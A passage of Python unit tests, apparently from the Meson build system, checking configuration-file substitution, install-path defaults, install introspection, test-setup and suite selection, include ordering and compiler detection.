(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '88 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '52 run target')
self.init(testdir)
self.run_target('check_exists')
self.run_target('check-env')
self.run_target('check-env-ct')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
'new_directory': 'share/new_directory',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
def read_logs():
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
return list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
logged = read_logs()
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
# Verify that with --dry-run we obtain the same logs but with nothing
# actually installed
windows_proof_rmtree(self.installdir)
self._run(self.meson_command + ['install', '--dry-run', '--destdir', self.installdir], workdir=self.builddir)
self.assertEqual(logged, read_logs())
self.assertFalse(os.path.exists(self.installdir))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_nopromote(self):
testdir = os.path.join(self.common_test_dir, '99 subproject subdir')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--wrap-mode=nopromote'])
self.assertIn('Dependency "subsub" not found', cm.exception.stdout)
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt'), encoding='utf-8') as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
# Setup that does not define a wrapper works with --wrapper
self._run(self.mtest_command + ['--setup=timeout', '--wrapper', shutil.which('valgrind')])
# Setup that skips test works
self._run(self.mtest_command + ['--setup=good'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
exclude_suites_log = f.read()
self.assertFalse('buggy' in exclude_suites_log)
# --suite overrides add_test_setup(xclude_suites)
self._run(self.mtest_command + ['--setup=good', '--suite', 'buggy'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
include_suites_log = f.read()
self.assertTrue('buggy' in include_suites_log)
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt'), encoding='utf-8') as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt'), encoding='utf-8') as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '130 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '131 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl. This can be either an
# ld-like linker of link.exe-like linker (usually the
# former for msys2, the latter otherwise)
self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)
# Need a new env to re-run environment loading
env = get_fake_env(testdir, self.builddir, self.prefix)
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '134 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
